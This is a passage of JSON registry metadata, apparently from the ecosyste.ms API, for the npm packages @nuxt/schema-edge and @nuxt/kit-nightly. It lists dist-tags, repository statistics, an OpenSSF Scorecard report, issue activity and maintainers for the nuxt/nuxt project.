@nuxt/schema-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.0-28284309.b3d3d7f4","pr-20836":"3.6.0-28072625.2e2d8450","pr-20910":"3.5.1-28071980.657d1b01","pr-21066":"3.5.2-28084070.1bb05d83","pr-21450":"3.6.0-28124217.43844474","pr-19403":"3.6.0-28106934.bccf6dd0","pr-21461":"3.6.0-28107353.3fa5f90a","pr-21655":"3.6.0-28121506.bee3dde2","pr-21573":"3.6.0-28121201.45550c5f","pr-21705":"3.6.0-28125223.60c7ae2d","pr-21793":"3.6.3-28155682.16a8312f","pr-22224":"3.7.0-28163062.f38eafa6","pr-22227":"3.6.5-28163125.3d0d7508","pr-21747":"3.7.0-28179135.c12f0f09","pr-22362":"3.7.0-28179877.ea6d5c28","pr-21641":"3.8.0-28246590.5d47cf10","pr-22465":"3.7.0-28184377.9a30357e","pr-22494":"3.7.0-28185860.e8cb8914","pr-22515":"3.7.0-28197383.e0d6624f","pr-23526":"3.8.0-28275051.7cb8d079"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:03.640Z","dependent_packages_count":3,"downloads":23408,"downloads_period":"last-month","dependent_repos_count":3,"rankings":{"downloads":0.8599740311419283,"dependent_repos_count":6.6554308386958,"dependent_packages_count":5.802168501741519,"stargazers_count":0.16555434541341432,"forks_count":0.547007888414416,"docker_downloads_count":1.0804662165562962,"average":2.5184336369938958},"purl":"pkg:npm/%40nuxt/schema-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/schema-edge","docker_dependents_count":10,"docker_downloads_count":294,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/schema-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/schema-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-04-29T15:00:10.594Z","issues_count":6012,"pull_requests_count":6873,"avg_time_to_close_issue":11687876.257486388,"avg_time_to_close_pull_request":788508.7928300017,"issues_closed_count":4403,"pull_requests_closed_count":6053,"pull_request_authors_count":592,"issue_authors_count":3405,"avg_comments_per_issue":4.152361942781105,"avg_comments_per_pull_request":2.4965808235122946,"merged_pull_requests_count":5387,"bot_issues_count":12,"bot_pull_requests_count":2974,"past_year_issues_count":569,"past_year_pull_requests_count":797,"past_year_avg_time_to_close_issue":619953.7635135135,"past_year_avg_time_to_close_pull_request":235897.91202872532,"past_year_issues_closed_count":296,"past_year_pull_requests_closed_count":557,"past_year_pull_request_authors_count":102,"past_year_issue_authors_count":437,"past_year_avg_comments_per_issue":2.2530755711775043,"past_year_avg_comments_per_pull_request":3.1442910915934754,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":271,"past_year_merged_pull_requests_count":485,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1325,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"huang-julien","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"Mini-ghost","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"atinux","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fschema-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-10T13:50:49.162Z","updated_at":"2022-11-10T13:50:49.162Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:41.645Z","updated_at":"2023-08-19T18:25:41.645Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8418503,"name":"@nuxt/kit-nightly","ecosystem":"npm","description":"Toolkit for authoring modules and interacting with Nuxt","homepage":"https://nuxt.com/docs/4.x/api/kit","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":3106,"first_release_published_at":"2023-10-12T12:20:39.902Z","latest_release_published_at":"2023-10-12T12:20:39.902Z","latest_release_number":"0.0.0","last_synced_at":"2026-05-11T01:23:40.053Z","created_at":"2023-10-12T13:54:41.531Z","updated_at":"2026-05-11T01:23:40.053Z","registry_url":"https://www.npmjs.com/package/@nuxt/kit-nightly","install_command":"npm install @nuxt/kit-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"pr-22649":"3.9.0-28354214.15a5e77d","pr-24010":"3.9.0-28378645.e9794ea0","pr-24787":"3.9.0-28378659.75a82c63","pr-24922":"3.10.0-28394973.15b95165","pr-24894":"3.10.0-28404855.4f7de5af","pr-23368":"3.10.0-28412264.57594fa2","pr-25210":"3.10.0-28422040.922a0429","pr-24960":"3.9.2-28423518.40bfb173","pr-25071":"3.10.0-28425618.d0e71656","pr-25770":"3.10.2-28463758.ae976d69","pr-26085":"3.11.0-28494221.a1f9ca9e","pr-25936":"3.11.0-28508900.dcd73d30","pr-26928":"3.12.0-28567604.d4b61ffd","pr-27037":"3.12.0-28577690.5048d11c","5x":"5.0.0-29640169.76693a26","latest":"4.4.5-29640539.354d595c","3x":"3.21.5-29640925.9fc42f78"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.